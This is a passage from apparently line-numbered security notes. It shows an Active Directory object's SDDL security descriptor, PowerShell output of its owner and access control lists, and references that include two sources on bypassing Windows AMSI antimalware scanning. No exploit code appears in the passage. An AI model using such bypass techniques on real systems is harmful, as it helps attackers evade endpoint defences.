1-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
    465 
    466 Owner            : BUILTIN\Administrators
    467 Group            : BUILTIN\Administrators
    468 DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
    469                    AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
    470                    Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
    471                    (CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
    472                    WriteExtendedAttributes)...}
    473 SystemAcl        : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
    474                    BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
    475                    SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
    476                    (Traverse)...}
    477 RawDescriptor    : System.Security.AccessControl.CommonSecurityDescriptor
    478 ```
    479 
    480 ## References
    481 
    482 - [1] [New AMSI Bypass Using CLR Hooking](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/)
    483 - [2] [DebugAmsi](https://github.com/MzHmO/DebugAmsi)
    484 - [3] [Managing the Recycle Bin with PowerShell](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)